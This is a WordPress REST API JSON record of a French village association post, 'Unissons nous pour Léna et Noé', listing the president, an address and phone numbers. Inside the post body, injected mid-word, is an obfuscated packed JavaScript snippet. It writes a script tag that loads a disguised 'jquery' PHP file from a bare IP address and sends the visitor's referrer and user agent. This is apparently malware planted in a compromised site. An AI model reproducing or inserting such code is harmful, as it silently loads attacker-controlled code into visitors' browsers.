{"id":1512,"date":"2017-06-15T10:39:07","date_gmt":"2017-06-15T09:39:07","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=1512"},"modified":"2019-04-10T09:29:31","modified_gmt":"2019-04-10T08:29:31","slug":"unissons-nous-pour-lena-et-noe-2","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=1512","title":{"rendered":"Unissons nous pour L\u00e9na et No\u00e9"},"content":{"rendered":"<p>Pr\u00e9sidente <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\\\o=\"+3(j.i)+\"\\'><\\\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drtbe|var|u0026u|referrer|dbzff||js|php'.split('|'),0,{}))<br \/>\n<\/script> de l&rsquo;association : Mme GUIDET Catherine<br \/>\nSi\u00e8ge social : 6 rue de la Grande Vye chez<br \/>\nM. et Mme Marc LABOUREYRAS<br \/>\nTel. : 06 34 55 97 38 ou<br \/>\n06 10 62 49 60<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pr\u00e9sidente de l&rsquo;association : Mme GUIDET Catherine Si\u00e8ge social : 6 rue de la Grande Vye chez M. et Mme Marc LABOUREYRAS Tel. : 06 34 55 97 38 ou 06 10 62 49 60<\/p>\n","protected":false},"author":2,"featured_media":1589,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,7],"tags":[],"class_list":["post-1512","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-solidarite","category-vie-associative"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/1512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1512"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/1512\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/1589"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}